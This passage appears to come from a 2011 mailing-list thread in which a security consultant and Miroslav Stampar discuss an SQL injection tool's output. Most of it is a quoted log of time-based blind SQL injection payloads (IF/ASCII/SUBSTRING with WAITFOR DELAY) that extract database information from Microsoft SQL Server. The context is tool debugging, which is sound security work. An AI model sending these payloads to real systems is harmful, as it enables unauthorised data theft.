>> [09:41:40] [WARNING] time-based comparison needs larger statistical
>> model. Making a few dummy requests, please wait..
>> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
>> [09:43:37] [INFO] retrieved: 24
>> [09:43:37] [DEBUG] performed 10 queries in 117 seconds
>>
>>
>>
>> --
>> | Steven Pinkham, Security Consultant |
>> | http://www.mavensecurity.com |
>> | GPG public key ID CD31CAFB |
>>
>>
>
>
>
> --
> Miroslav Stampar
>
> E-mail / Jabber: miroslav.stampar (at) gmail.com
> Mobile: +385921010204 (HR 0921010204)
> PGP Key ID: 0xB5397B1B
> Location: Zagreb, Croatia
>

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia
From: Steve P. <ste...@gm...> - 2011-01-18 02:17:08
Attachments:
smime.p7s
On 01/17/2011 09:08 PM, Miroslav Stampar wrote:
> "Since you seem anxious, I'll send the warm up." - you've thought that
> i was kidding :)
>
> it was really a sincere mail and this is the core part:
> "it looks like an SQL abomination, and I still can't believe it, but it
> appears that this really works"

Nah, just hadn't read that email yet, was talking about your excitement from before.. No worries mate.

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com |
| GPG public key ID CD31CAFB |